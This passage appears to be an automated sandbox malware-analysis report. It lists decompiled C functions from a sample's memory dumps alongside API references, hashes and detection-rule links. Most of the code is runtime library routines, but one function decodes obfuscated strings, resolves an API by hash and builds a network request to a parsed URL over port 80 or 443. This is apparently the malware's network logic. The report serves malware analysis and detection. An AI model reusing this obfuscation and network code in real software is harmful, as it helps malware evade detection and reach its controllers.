						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t182 = _v72;
					_t167 = _t182 + 0x350;
					 *_t167 =  *(_t182 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t296;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				E00415A87();
				return _a4;
			}

0x0042690a
0x00426911
0x00426914
0x00426919
0x00426921
0x00426924
0x00426928
0x0042692b
0x00426935
0x0042693f
0x00426941
0x00426944
0x00426947
0x0042694d
0x0042694f
0x00426956
0x00426963
0x00426964
0x00426967
0x0042696a
0x0042696b
0x0042696c
0x0042696f
0x00426974
0x00426c80
0x00426c80
0x0042697a
0x0042697a
0x0042697d
0x0042697f
0x00426985
0x00426988
0x0042698f
0x00426996
0x0042699f
0x00000000
0x00000000
0x004269a5
0x004269ab
0x004269ad
0x004269af
0x004269b2
0x004269b7
0x004269bb
0x00000000
0x00000000
0x00000000
0x004269bb
0x004269c0
0x004269c3
0x004269c5
0x004269ca
0x00426a7c
0x00426a7d
0x00426a80
0x00426a82
0x00426c30
0x00426c32
0x00000000
0x00426c34
0x00426c34
0x00426c37
0x00426c3a
0x00426c43
0x00426c46
0x00426c47
0x00426c4b
0x00426c4e
0x00426c4e
0x00000000
0x00426c52
0x00426a88
0x00426a88
0x00426a8d
0x00426a90
0x00426a96
0x00426a9c
0x00426aa5
0x00426aa8
0x00426aa8
0x00426aa9
0x00426aaa
0x00426aad
0x00426aae
0x00000000
0x00426aae
0x004269d0
0x004269df
0x004269e0
0x004269e3
0x004269e5
0x004269ea
0x00426bfb
0x00426bfd
0x00426bff
0x00426c02
0x00426c07
0x00426c10
0x00426c13
0x00426c14
0x00426c18
0x00426c1b
0x00426c1e
0x00426c1e
0x00426c22
0x00426c22
0x00426c22
0x00426c25
0x00426c25
0x00426c25
0x00426c27
0x00426c27
0x00426c2b
0x004269f0
0x004269f0
0x004269f4
0x004269f6
0x004269f9
0x004269fc
0x00426a00
0x00426a01
0x00426a05
0x00426a05
0x00426a08
0x00426a0d
0x00426a19
0x00426a1e
0x00426a21
0x00426a21
0x00426a26
0x00426a28
0x00426a2b
0x00426a2d
0x00426a30
0x00426a33
0x00426a36
0x00426a3e
0x00426a42
0x00426a46
0x00426a46
0x00426a4c
0x00426a52
0x00426a55
0x00426a5d
0x00426a64
0x00426a68
0x00426a69
0x00426a6c
0x00426a6d
0x00426ab1
0x00426ab1
0x00426ab5
0x00426ab6
0x00426abb
0x00426ac1
0x00000000
0x00426ac7
0x00426acb
0x00426b54
0x00426b5b
0x00426b63
0x00426b6b
0x00426b70
0x00426b73
0x00426b78
0x00000000
0x00426b7e
0x00426b93
0x00426c77
0x00426c7d
0x00000000
0x00426b99
0x00426ba2
0x00426ba4
0x00426baa
0x00000000
0x00426bb0
0x00426bb4
0x00426bea
0x00426bed
0x00000000
0x00426bf3
0x00426bf3
0x00000000
0x00426bf3
0x00426bb6
0x00426bb8
0x00426bba
0x00426bd3
0x00000000
0x00426bd9
0x00426bdd
0x00000000
0x00426be3
0x00426be3
0x00426be6
0x00426be7
0x00000000
0x00426be7
0x00426bdd
0x00426bd3
0x00426bb4
0x00426baa
0x00426b93
0x00426b78
0x00426ac1
0x004269ea
0x00000000
0x00426ad2
0x00426ad2
0x00426ad5
0x00426ad9
0x00426adc
0x00426afe
0x00426b01
0x00426b06
0x00426b0a
0x00426b0e
0x00426b3c
0x00426b3e
0x00000000
0x00426b10
0x00426b10
0x00426b13
0x00426b16
0x00426b19
0x00426c54
0x00426c57
0x00426c64
0x00426c6f
0x00426c74
0x00000000
0x00426b1f
0x00426b26
0x00426b2b
0x00426b2e
0x00426b31
0x00000000
0x00426b37
0x00426b37
0x00000000
0x00426b37
0x00426b31
0x00426b19
0x00426ade
0x00426ae5
0x00426aea
0x00426af0
0x00426af2
0x00426af9
0x00426b3f
0x00426b42
0x00426b43
0x00426b48
0x00426b4b
0x00426b4e
0x00000000
0x00000000
0x00000000
0x00000000
0x00426b4e
0x00000000
0x00426adc
0x0042697d
0x00426c83
0x00426c83
0x00426c85
0x00426c88
0x00426c88
0x00426c88
0x00426c88
0x00426c9a
0x00426c9c
0x00426c9d
0x00426c9e
0x00426ca2
0x00426caa

APIs

GetConsoleCP.KERNEL32 ref: 00426947
__fassign.LIBCMT ref: 00426B26
__fassign.LIBCMT ref: 00426B43

Part of subcall function 0042C2CD: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00427291,?,00000000,?,?,?,00427008,0000FDE9,00000000,?), ref: 0042C36F

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00426B8B
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00426BCB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00426C77

Part of subcall function 00415A87: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00416245
Part of subcall function 00415A87: ___raise_securityfailure.LIBCMT ref: 0041632C

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: FileWrite__fassign$ByteCharConsoleErrorFeatureLastMultiPresentProcessorWide___raise_securityfailure
String ID:
API String ID: 2264489263-0
Opcode ID: 4dd97256f38a51f94c440b761b127d80a4afd7a344663fbf7d92ab2ca31bf28e
Instruction ID: 9f32fbbf046c13e0fadb7e325b6902d069c1937f57b7eadb58d8aa6e73f42fb6
Opcode Fuzzy Hash: 4dd97256f38a51f94c440b761b127d80a4afd7a344663fbf7d92ab2ca31bf28e
Instruction Fuzzy Hash: 51D1DDB1E002689FCF11CFA9D8809EDBBB5FF09314F69016AE855FB341D634A946CB58

Uniqueness

Uniqueness Score: 5.06%

Function 004268FF, Relevance: 9.3, APIs: 6, Instructions: 319fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 00426947
__fassign.LIBCMT ref: 00426B26
__fassign.LIBCMT ref: 00426B43

Part of subcall function 0042C2CD: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0042A3F9,?,00000000,00000000), ref: 0042C36F

WriteFile.KERNEL32(?,00000020,00000000,?,00000000), ref: 00426B8B
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00426BCB
GetLastError.KERNEL32 ref: 00426C77

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: FileWrite__fassign$ByteCharConsoleErrorLastMultiWide
String ID:
API String ID: 1172476143-0
Opcode ID: f593203aa5ba31efbe79807766e9bc1ccca6774457406e1251e1e273e8d0d37d
Instruction ID: 9f32fbbf046c13e0fadb7e325b6902d069c1937f57b7eadb58d8aa6e73f42fb6
Opcode Fuzzy Hash: f593203aa5ba31efbe79807766e9bc1ccca6774457406e1251e1e273e8d0d37d
Instruction Fuzzy Hash: 51D1DDB1E002689FCF11CFA9D8809EDBBB5FF09314F69016AE855FB341D634A946CB58

Uniqueness

Uniqueness Score: 5.06%

Function 00424976, Relevance: 9.3, APIs: 6, Instructions: 265
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00424976(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int* _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				signed int* _v724;
				intOrPtr _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t146;
				void* _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				intOrPtr _t157;
				signed int _t160;
				signed int _t162;
				signed int _t163;
				intOrPtr _t165;
				signed int _t168;
				signed int _t169;
				signed int _t171;
				signed int _t172;
				signed int _t190;
				signed int _t192;
				signed int _t194;
				signed int _t199;
				signed int _t201;
				signed int _t209;
				intOrPtr* _t210;
				signed int _t219;
				intOrPtr _t222;
				intOrPtr* _t223;
				signed int _t225;
				signed int* _t229;
				signed int _t230;
				signed int _t236;
				void* _t237;
				signed int _t238;
				intOrPtr _t240;
				signed int _t246;
				signed int _t248;
				signed int _t251;
				signed int* _t252;
				intOrPtr* _t253;
				short _t254;
				signed int _t256;
				signed int _t258;
				void* _t260;
				void* _t262;
				void* _t273;

				_t256 = _t258;
				_t146 =  *0x44b6b4; // 0x4a5cc10f
				_v8 = _t146 ^ _t256;
				_push(__ebx);
				_t201 = _a8;
				_push(__esi);
				_push(__edi);
				_t240 = _a4;
				_v736 = _t201;
				_v724 = E004251AF(__ecx, __edx, _t273) + 0x278;
				_t153 = E00424049(_t201, __ecx, __edx, _t240, _a12, _t273, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v712);
				_t260 = _t258 - 0x2e4 + 0x18;
				if(_t153 == 0) {
					L39:
					_t154 = 0;
					__eflags = 0;
					goto L40;
				} else {
					_t10 = _t201 + 2; // 0x6
					_t246 = _t10 << 4;
					_t155 =  &_v272;
					_v716 = _t246;
					_t236 =  *(_t246 + _t240);
					_t209 = _t236;
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t248 = _v716;
						if( *_t155 !=  *_t209) {
							break;
						}
						if( *_t155 == 0) {
							L6:
							_t156 = _v704;
						} else {
							_t254 =  *((intOrPtr*)(_t155 + 2));
							_v706 = _t254;
							_t248 = _v716;
							if(_t254 !=  *((intOrPtr*)(_t209 + 2))) {
								break;
							} else {
								_t155 = _t155 + 4;
								_t209 = _t209 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L6;
								}
							}
						}
						L8:
						if(_t156 != 0) {
							_t210 =  &_v272;
							_t237 = _t210 + 2;
							do {
								_t157 =  *_t210;
								_t210 = _t210 + 2;
								__eflags = _t157 - _v704;
							} while (_t157 != _v704);
							_v720 = (_t210 - _t237 >> 1) + 1;
							_t160 = E0042151C(4 + ((_t210 - _t237 >> 1) + 1) * 2);
							_v732 = _t160;
							__eflags = _t160;
							if(_t160 == 0) {
								goto L39;
							} else {
								_v728 =  *((intOrPtr*)(_t248 + _t240));
								_v740 =  *(_t240 + 0xa0 + _t201 * 4);
								_v744 =  *(_t240 + 8);
								_v708 = _t160 + 4;
								_t162 = E00421D09(_t160 + 4, _v720,  &_v272);
								_t262 = _t260 + 0xc;
								__eflags = _t162;
								if(_t162 != 0) {
									_t163 = _v704;
									_push(_t163);
									_push(_t163);
									_push(_t163);
									_push(_t163);
									_push(_t163);
									E0041A842();
									asm("int3");
									_t165 =  *0x44de88; // 0x0
									return _t165;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t248 + _t240)) = _v708;
									if(_v272 != 0x43) {
										L17:
										_t168 = E00423D56(_t201, _t240,  &_v700);
										_t219 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L17;
										} else {
											_t219 = _v704;
											_t168 = _t219;
										}
									}
									 *(_t240 + 0xa0 + _t201 * 4) = _t168;
									__eflags = _t201 - 2;
									if(_t201 != 2) {
										__eflags = _t201 - 1;
										if(_t201 != 1) {
											__eflags = _t201 - 5;
											if(_t201 == 5) {
												 *((intOrPtr*)(_t240 + 0x14)) = _v712;
											}
										} else {
											 *((intOrPtr*)(_t240 + 0x10)) = _v712;
										}
									} else {
										_t252 = _v724;
										_t238 = _t219;
										_t229 = _t252;
										 *(_t240 + 8) = _v712;
										_v708 = _t252;
										_v720 = _t252[8];
										_v712 = _t252[9];
										while(1) {
											__eflags =  *(_t240 + 8) -  *_t229;
											if( *(_t240 + 8) ==  *_t229) {
												break;
											}
											_t253 = _v708;
											_t238 = _t238 + 1;
											_t199 =  *_t229;
											 *_t253 = _v720;
											_v712 = _t229[1];
											_t229 = _t253 + 8;
											 *((intOrPtr*)(_t253 + 4)) = _v712;
											_t201 = _v736;
											_t252 = _v724;
											_v720 = _t199;
											_v708 = _t229;
											__eflags = _t238 - 5;
											if(_t238 < 5) {
												continue;
											} else {
											}
											L25:
											__eflags = _t238 - 5;
											if(__eflags == 0) {
												_t190 = E0042A148(__eflags, _v704, 1, 0x43dac8, 0x7f,  &_v528,  *(_t240 + 8), 1);
												_t262 = _t262 + 0x1c;
												__eflags = _t190;
												if(_t190 == 0) {
													_t230 = _v704;
												} else {
													_t192 = _v704;
													do {
														 *(_t256 + _t192 * 2 - 0x20c) =  *(_t256 + _t192 * 2 - 0x20c) & 0x000001ff;
														_t192 = _t192 + 1;
														__eflags = _t192 - 0x7f;
													} while (_t192 < 0x7f);
													_t194 = E0041852C( &_v528,  *0x44b830, 0xfe);
													_t262 = _t262 + 0xc;
													__eflags = _t194;
													_t230 = 0 | _t194 == 0x00000000;
												}
												_t252[1] = _t230;
												 *_t252 =  *(_t240 + 8);
											}
											 *(_t240 + 0x18) = _t252[1];
											goto L37;
										}
										__eflags = _t238;
										if(_t238 != 0) {
											 *_t252 =  *(_t252 + _t238 * 8);
											_t252[1] =  *(_t252 + 4 + _t238 * 8);
											 *(_t252 + _t238 * 8) = _v720;
											 *(_t252 + 4 + _t238 * 8) = _v712;
										}
										goto L25;
									}
									L37:
									_t169 = _t201 * 0xc;
									_t106 = _t169 + 0x43db50; // 0x416150
									 *0x437268(_t240);
									_t171 =  *((intOrPtr*)( *_t106))();
									_t222 = _v728;
									__eflags = _t171;
									if(_t171 == 0) {
										__eflags = _t222 - 0x44b900;
										if(_t222 == 0x44b900) {
											L44:
											_t172 = _v716;
										} else {
											_t251 = _t201 + _t201;
											__eflags = _t251;
											asm("lock xadd [eax], ecx");
											if(_t251 != 0) {
												goto L44;
											} else {
												E004214E2( *((intOrPtr*)(_t240 + 0x28 + _t251 * 8)));
												E004214E2( *((intOrPtr*)(_t240 + 0x24 + _t251 * 8)));
												E004214E2( *(_t240 + 0xa0 + _t201 * 4));
												_t172 = _v716;
												_t225 = _v704;
												 *(_t172 + _t240) = _t225;
												 *(_t240 + 0xa0 + _t201 * 4) = _t225;
											}
										}
										_t223 = _v732;
										 *_t223 = 1;
										_t154 =  *(_t172 + _t240);
										 *((intOrPtr*)(_t240 + 0x28 + (_t201 + _t201) * 8)) = _t223;
									} else {
										 *((intOrPtr*)(_v716 + _t240)) = _t222;
										E004214E2( *(_t240 + 0xa0 + _t201 * 4));
										 *(_t240 + 0xa0 + _t201 * 4) = _v740;
										E004214E2(_v732);
										 *(_t240 + 8) = _v744;
										goto L39;
									}
									goto L40;
								}
							}
						} else {
							_t154 = _t236;
							L40:
							E00415A87();
							return _t154;
						}
						goto L48;
					}
					asm("sbb eax, eax");
					_t156 = _t155 | 0x00000001;
					__eflags = _t156;
					goto L8;
				}
				L48:
			}

0x00424979
0x00424981
0x00424988
0x0042498b
0x0042498c
0x0042498f
0x00424993
0x00424994
0x00424997
0x004249a7
0x004249ca
0x004249cf
0x004249d4
0x00424cac
0x00424cac
0x00424cac
0x00000000
0x004249da
0x004249da
0x004249dd
0x004249e0
0x004249e6
0x004249ec
0x004249ef
0x004249f1
0x004249f4
0x004249fe
0x00424a04
0x00000000
0x00000000
0x00424a0a
0x00424a33
0x00424a33
0x00424a0c
0x00424a0c
0x00424a14
0x00424a1b
0x00424a21
0x00000000
0x00424a23
0x00424a23
0x00424a26
0x00424a31
0x00000000
0x00000000
0x00000000
0x00000000
0x00424a31
0x00424a21
0x00424a40
0x00424a42
0x00424a4b
0x00424a51
0x00424a54
0x00424a54
0x00424a57
0x00424a5a
0x00424a5a
0x00424a6a
0x00424a78
0x00424a7d
0x00424a84
0x00424a86
0x00000000
0x00424a8c
0x00424a92
0x00424a9f
0x00424aa8
0x00424abb
0x00424ac2
0x00424ac7
0x00424aca
0x00424acc
0x00424d2e
0x00424d34
0x00424d35
0x00424d36
0x00424d37
0x00424d38
0x00424d39
0x00424d3e
0x00424d3f
0x00424d45
0x00424ad2
0x00424ad2
0x00424ae0
0x00424ae3
0x00424af9
0x00424b00
0x00424b06
0x00424ae5
0x00424ae5
0x00424aed
0x00000000
0x00424aef
0x00424aef
0x00424af5
0x00424af5
0x00424aed
0x00424b0c
0x00424b13
0x00424b16
0x00424c36
0x00424c39
0x00424c46
0x00424c49
0x00424c51
0x00424c51
0x00424c3b
0x00424c41
0x00424c41
0x00424b1c
0x00424b1c
0x00424b22
0x00424b2a
0x00424b2c
0x00424b2f
0x00424b38
0x00424b41
0x00424b47
0x00424b4a
0x00424b4c
0x00000000
0x00000000
0x00424b4e
0x00424b54
0x00424b55
0x00424b60
0x00424b68
0x00424b70
0x00424b73
0x00424b76
0x00424b7c
0x00424b82
0x00424b88
0x00424b8e
0x00424b91
0x00000000
0x00000000
0x00424b93
0x00424bb8
0x00424bb8
0x00424bbb
0x00424bd8
0x00424bdd
0x00424be0
0x00424be2
0x00424c20
0x00424be4
0x00424be4
0x00424bea
0x00424bef
0x00424bf7
0x00424bf8
0x00424bf8
0x00424c0f
0x00424c16
0x00424c19
0x00424c1b
0x00424c1b
0x00424c26
0x00424c2c
0x00424c2c
0x00424c31
0x00000000
0x00424c31
0x00424b95
0x00424b97
0x00424b9c
0x00424ba2
0x00424bab
0x00424bb4
0x00424bb4
0x00000000
0x00424b97
0x00424c54
0x00424c54
0x00424c58
0x00424c60
0x00424c66
0x00424c69
0x00424c6f
0x00424c71
0x00424cbf
0x00424cc5
0x00424d11
0x00424d11
0x00424cc7
0x00424ccc
0x00424ccc
0x00424cd2
0x00424cd6
0x00000000
0x00424cd8
0x00424cdc
0x00424ce5
0x00424cf1
0x00424cf6
0x00424cff
0x00424d05
0x00424d08
0x00424d08
0x00424cd6
0x00424d17
0x00424d1f
0x00424d25
0x00424d28
0x00424c73
0x00424c79
0x00424c83
0x00424c95
0x00424c9c
0x00424ca9
0x00000000
0x00424ca9
0x00000000
0x00424c71
0x00424acc
0x00424a44
0x00424a44
0x00424cae
0x00424cb6
0x00424cbe
0x00424cbe
0x00000000
0x00424a42
0x00424a3b
0x00424a3d
0x00424a3d
0x00000000
0x00424a3d
0x00000000

APIs

Part of subcall function 004251AF: GetLastError.KERNEL32(00000008,?,1FFFFFFF,00420A55,?,?,00413761,?,?,h}D,?), ref: 004251B4
Part of subcall function 004251AF: _free.LIBCMT ref: 00425211
Part of subcall function 004251AF: _free.LIBCMT ref: 00425247
Part of subcall function 004251AF: SetLastError.KERNEL32(00000000,00000005,000000FF,?,1FFFFFFF,00420A55,?,?,00413761,?,?,h}D,?), ref: 00425252

Part of subcall function 0042151C: RtlAllocateHeap.NTDLL(00000000,0041370C,?,?,00416C35,?,?,1FFFFFFF,00000008,?,00413478,0041370C,?,?,?,?), ref: 0042154E

Part of subcall function 0042A148: GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,E8458D00), ref: 0042A218
Part of subcall function 0042A148: __freea.LIBCMT ref: 0042A221

_memcmp.LIBVCRUNTIME ref: 00424C0F
_free.LIBCMT ref: 00424C83
_free.LIBCMT ref: 00424C9C

Part of subcall function 00415A87: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00416245
Part of subcall function 00415A87: ___raise_securityfailure.LIBCMT ref: 0041632C

_free.LIBCMT ref: 00424CDC

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,0042E280,?,00000000,?,?,?,0042E525,?,00000007,?,?,0042E964,?,?), ref: 0042150A

_free.LIBCMT ref: 00424CE5
_free.LIBCMT ref: 00424CF1

Part of subcall function 0041A842: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0041A844
Part of subcall function 0041A842: GetCurrentProcess.KERNEL32(C0000417,?,0041370C), ref: 0041A867
Part of subcall function 0041A842: TerminateProcess.KERNEL32(00000000,?,0041370C), ref: 0041A86E

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: _free$ErrorLast$FeatureHeapPresentProcessProcessor$AllocateCurrentFreeStringTerminateType___raise_securityfailure__freea_memcmp
String ID:
API String ID: 958597265-0
Opcode ID: 3c758bee16869c41b58cf7e3da959ca31d25444a17632f31dad878869ff7a02c
Instruction ID: b4a8f7c5f8082aa1a2ed5b16bb8f100b9d9098e73feff67dff0fbc50e3e306bb
Opcode Fuzzy Hash: 3c758bee16869c41b58cf7e3da959ca31d25444a17632f31dad878869ff7a02c
Instruction Fuzzy Hash: F2B14C75A012299BDB24DF19D884BAEB7B4FF58304F5045EEE809A7350D774AE90CF48

Uniqueness

Uniqueness Score: 12.89%

Function 00406DD2, Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 169
stringUNIQUE

Download Yara Rule

C-Code - Quality: 91%

			E00406DD2(void* __ecx, WCHAR* _a4) {
				WCHAR* _v8;
				WCHAR* _v12;
				short _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				char _v49;
				intOrPtr _v53;
				intOrPtr _v57;
				intOrPtr _v61;
				intOrPtr _v65;
				intOrPtr _v69;
				intOrPtr _v73;
				intOrPtr _v77;
				intOrPtr _v81;
				intOrPtr _v85;
				intOrPtr _v89;
				intOrPtr _v93;
				intOrPtr _v97;
				intOrPtr _v101;
				intOrPtr _v105;
				intOrPtr _v109;
				intOrPtr _v113;
				char _v114;
				short _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v133;
				char _v134;
				short _v136;
				char _v140;
				char _v148;
				char _v660;
				char _v1172;
				void* __ebx;
				signed int _t69;
				char _t71;
				void* _t75;
				void* _t80;
				int _t81;
				signed int _t88;
				intOrPtr* _t94;
				WCHAR* _t99;
				WCHAR* _t100;
				void* _t101;
				signed short* _t113;
				void* _t114;
				signed int _t117;
				void* _t118;
				signed int _t120;
				void* _t122;
				void* _t123;

				_t117 = 0;
				E0040C70B( &_v1172, 0, 0x400);
				_t100 = _a4;
				_t123 = _t122 + 0xc;
				_t120 = 0;
				while(1) {
					_t69 = _t100[_t120] & 0x0000ffff;
					if(_t69 == 0) {
						break;
					}
					if(_t69 != 0x3a) {
						L10:
						_t120 = _t120 + 1;
						_t131 = _t117;
						if(_t117 == 0) {
							continue;
						}
					} else {
						_t120 = _t120 + 3;
						_v8 = _t120;
						if(_t120 < lstrlenW(_t100)) {
							_t116 = _t120 + _t120;
							_t113 = _t120 + _t120 + _t100;
							_t88 =  *_t113 & 0x0000ffff;
							_v12 = _t113;
							if(_t88 != 0) {
								_t114 = 0x2f;
								while(_t88 != _t114) {
									_t120 = _t120 + 1;
									_t99 =  &(_t100[_t120]);
									_v12 = _t99;
									_t88 =  *_t99 & 0x0000ffff;
									if(_t88 != 0) {
										continue;
									} else {
									}
									goto L10;
								}
								E004073EF( &_v1172, _t116 + _t100, _t120 - _v8);
								_t94 = E004010BB(_t100, 1, 0x2ca5f370);
								_t123 = _t123 + 0x14;
								 *_t94( &_v660,  &(_v12[1]));
								_t117 = 1;
								__eflags = 1;
							}
							goto L10;
						}
					}
					break;
				}
				E0040BB5A( &_v148);
				_t71 = 0x2f;
				_v133 = _t71;
				_v114 = _t71;
				_v140 = 0xd490fb45;
				_v136 = 0xcc61;
				_v134 = 0x74;
				_v132 = 0x741e30b9;
				_v128 = 0x86f94c0a;
				_v124 = 0xabf1aac5;
				_v120 = 0xabf1aa81;
				_v116 = 0x4b31;
				_v113 = 0x29b53da9;
				_v109 = 0xce48ef4;
				_v105 = 0x2c53976f;
				_v101 = 0x3d0c366c;
				_v97 = 0x26722a82;
				_v93 = 0xf52de194;
				_v89 = 0x9dffb4b7;
				_v85 = 0xeed75a8;
				_v81 = 0x137fa9f0;
				_v77 = 0xca693de9;
				_v73 = 0x227f7aa6;
				_v69 = 0xbf04432b;
				_v65 = 0xc8cff0ae;
				_v61 = 0xd507e306;
				_v57 = 0x535f4ea0;
				_v53 = 0x1378ea96;
				_v49 = 0x3b;
				_v8 = E00407563( &_v140);
				_v12 = 0x50;
				_t75 = E0040703E(_t131,  &_v1172);
				_t118 = 0;
				if(_t75 != 0) {
					_v12 = 0x1bb;
				}
				_t101 = E0040143B( *0x41988c,  *0x419894);
				_t133 = _t101;
				if(_t101 != 0) {
					_v48 = 0xe51fe8eb;
					_v44 = 0x268d336;
					_v40 = 0x75c23210;
					_v36 = 0x4ce917e5;
					_v32 = 0xfe70fba9;
					_v28 = 0xfe70fba3;
					_v24 = 0x35b81b3;
					_v20 = 0xd48e5248;
					_v16 = 0xdc9d;
					_t80 = E00407563( &_v48);
					_t81 = lstrlenW(_v8);
					_t118 = E0040BD14(_t101,  &_v148, _t133,  &_v1172,  &_v660, _t101, E00405CA9(_t101), _t118, _t118, _t118, _t118, _t80, _v8, _t81, _v12);
					E0040C6D1(_t101);
				}
				E0040BB66( &_v148);
				return _t118;
			}

0x00406de9
0x00406ded
0x00406df2
0x00406df5
0x00406df8
0x00406dfa
0x00406dfa
0x00406e01
0x00000000
0x00000000
0x00406e0a
0x00406e81
0x00406e81
0x00406e82
0x00406e84
0x00000000
0x00000000
0x00406e0c
0x00406e0c
0x00406e10
0x00406e1b
0x00406e1d
0x00406e20
0x00406e23
0x00406e26
0x00406e2c
0x00406e30
0x00406e31
0x00406e36
0x00406e37
0x00406e3a
0x00406e3d
0x00406e43
0x00000000
0x00000000
0x00406e45
0x00000000
0x00406e43
0x00406e58
0x00406e64
0x00406e6b
0x00406e7c
0x00406e80
0x00406e80
0x00406e80
0x00000000
0x00406e2c
0x00406e1b
0x00000000
0x00406e0a
0x00406e90
0x00406e97
0x00406e98
0x00406e9e
0x00406ea8
0x00406eb2
0x00406ebb
0x00406ec2
0x00406ec9
0x00406ed0
0x00406ed7
0x00406ede
0x00406ee4
0x00406eeb
0x00406ef2
0x00406ef9
0x00406f00
0x00406f07
0x00406f0e
0x00406f15
0x00406f1c
0x00406f23
0x00406f2a
0x00406f31
0x00406f38
0x00406f3f
0x00406f46
0x00406f4d
0x00406f54
0x00406f5d
0x00406f67
0x00406f6e
0x00406f77
0x00406f7a
0x00406f7c
0x00406f7c
0x00406f94
0x00406f98
0x00406f9a
0x00406fa3
0x00406fab
0x00406fb2
0x00406fb9
0x00406fc0
0x00406fc7
0x00406fce
0x00406fd5
0x00406fdc
0x00406fe2
0x00406ff0
0x00407022
0x00407024
0x00407029
0x00407030
0x0040703d

APIs

lstrlenW.KERNEL32(B1650C85,00000000,00000000,00000002), ref: 00406E13

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

Part of subcall function 0040703E: wsprintfW.USER32 ref: 0040724B

Part of subcall function 0040143B: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0040149A

lstrlenW.KERNEL32(0000887E,00000050,00000002), ref: 00406FF0

Part of subcall function 0040BD14: wsprintfW.USER32 ref: 0040BD85
Part of subcall function 0040BD14: wsprintfW.USER32 ref: 0040BD99

Part of subcall function 0040C6D1: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00408010,00000000,?,?,00408ACF,?,00000000,00000000,00000000), ref: 0040C6DE

Strings

1K, xrefs: 00406EDE
t, xrefs: 00406EBB
;, xrefs: 00406F54
P, xrefs: 00406F67

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: wsprintf$Virtuallstrlen$AllocFreeLibraryLoad
String ID: 1K$;$P$t
API String ID: 857140552-3320390116
Opcode ID: 5ee0d969f05adbfd0d5f2c6320d3323580db617fd9656414f0deab55b2f812db
Instruction ID: f7b0e37b1831e67f1ceeeec39e961446cfd470c9998592eb2bd2c44cdfe925dc
Opcode Fuzzy Hash: 5ee0d969f05adbfd0d5f2c6320d3323580db617fd9656414f0deab55b2f812db
Instruction Fuzzy Hash: 1A61A0B1C043189FDF20DF95D885ADEBBB8EF40304F1041AAE509BB291DB345A45CFA9

Uniqueness

Uniqueness Score: 100.00%

Function 0042C70A, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207
UNIQUE

Download Yara Rule

C-Code - Quality: 84%

			E0042C70A(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
